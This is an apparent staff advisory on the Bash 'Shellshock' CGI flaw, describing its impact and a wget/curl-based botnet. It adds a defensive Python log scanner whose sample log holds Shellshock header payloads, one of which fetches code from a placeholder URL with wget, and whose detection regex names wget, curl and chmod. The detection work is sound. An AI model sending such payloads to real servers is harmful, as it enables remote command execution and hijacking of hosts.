Genuine 10/10 nastiness for web-servers that use Bash CGI - you have all probably heard about this one - it's potentially far, far worse than the OpenSSL HeartBleed one... This is what I sent to all our staff yesterday:
*Introduction*

Many of you will have read about this in the press. For those that haven't, the simple summary is that the Bash shell that is used to execute CGI requests on most of the world's web servers has had a huge and easily-exploitable hole in it for 20 years. As everyone uses the same version of the Unix toolchain, everyone uses the same "Bash" and thus all Unix-based systems are equally vulnerable. It's rated as being far worse in real terms than the "HeartBleed" SSL issue, in that rather than "just" being able to trawl the memory space of the remote web server for username/password combos or private RSA keys, you can basically do what you like - you can execute arbitrary commands in the context of the remote shell. It's really easy/trivial to exploit this bug; examples are in the link below.

RedHat have probably the most concise description of this issue - see https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/

Note that the fix that was originally posted was incomplete; a new fix is yet to be delivered.

*How does this affect me?*

Possibly a lot, in that sites that you access and which have your data stored on them may well be completely open to attack. If you run your own web sites (nearly all run some variant of Linux), you should replace your Bash as soon as an approved fix is available. However, there is nothing you, as a client browser, can do to lessen your chances of being indirectly affected by such an attack - it's server-side only and therefore up to each Unix-based website that uses Bash-based CGI scripting to implement the fixes ASAP, or to simply disable Bash CGI until the fix is made.

This is being actively used in the wild already - a botnet was discovered within hours of the announcement. Cunningly, it uses wget or curl to download the botnet precursor, does a chmod 777, then executes the downloaded code to subvert the host and add it to the botnet.
Nick
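The post describes the bug from the server operator's side: a CGI handler copies request headers into environment variables, and an unpatched Bash treats any value that begins with `() {` as a function definition and runs whatever follows the closing brace. The most useful thing a site operator can do besides patching is to look for that prefix in their access logs. The following scanner is an added example written for this page, not code from the original post or from the RedHat write-up; the Apache combined log format, the field names `referer` and `agent`, the `EXAMPLE_PAYLOAD_URL` placeholder and the sample log lines are all constructed for the example. It flags requests whose Referer or User-Agent header carries the `() {` trigger, and additionally notes when the same value references wget, curl or chmod, the dropper behaviour the post mentions.

```python
"""Detect Shellshock-style probes in web-server access logs.

Added example, not part of the original mailing-list post. The log format
(Apache "combined": referer and user-agent are the last two quoted fields)
and the sample lines are constructed for this example.
"""
import re
from typing import Dict, List

# Apache combined format:
# ip - - [time] "request" status size "referer" "user-agent"
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# An unpatched Bash only honours the exported-function trick when the
# variable value *starts* with "() {"; everything after the closing brace is
# what gets executed. Matching that prefix is the core detection.
_SHELLSHOCK_RE = re.compile(r'^\s*\(\)\s*\{')

# Indicators the post mentions: the botnet fetches its payload with wget or
# curl and chmods it before running it.
_DROPPER_RE = re.compile(r'\b(wget|curl|chmod)\b')


def parse_line(line: str) -> Dict[str, str]:
    """Split one combined-format access-log line into its named fields."""
    m = _LOG_RE.match(line.rstrip("\n"))
    if not m:
        raise ValueError(f"unrecognised log line: {line!r}")
    return m.groupdict()


def classify(entry: Dict[str, str]) -> Dict[str, object]:
    """Report which header fields carry the trigger and whether a dropper is referenced."""
    fields = [f for f in ("referer", "agent") if _SHELLSHOCK_RE.search(entry[f])]
    dropper = any(_DROPPER_RE.search(entry[f]) for f in fields)
    return {
        "ip": entry["ip"],
        "request": entry["request"],
        "fields": fields,
        "dropper": dropper,
    }


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per request whose headers carry the Shellshock trigger."""
    findings = []
    for line in lines:
        try:
            entry = parse_line(line)
        except ValueError:
            continue  # malformed line: skip it rather than abort the whole scan
        result = classify(entry)
        if result["fields"]:
            findings.append(result)
    return findings


# Constructed sample lines: a benign request, a probe in the User-Agent, and a
# probe in the Referer that also references a download tool (placeholder URL).
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Sep/2014:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [25/Sep/2014:10:01:03 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 200 512 "-" "() { :;}; echo probe"',
    '198.51.100.9 - - [25/Sep/2014:10:01:04 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 200 512 "() { :;}; /usr/bin/wget EXAMPLE_PAYLOAD_URL" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Only the Referer and User-Agent fields are visible in a standard combined log; other headers a CGI server exports into the environment (Cookie, Host, custom headers) are not logged by default, so a clean scan is evidence of absence only for those two fields. Patching Bash, or disabling Bash-backed CGI until the complete fix lands, remains the actual mitigation.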
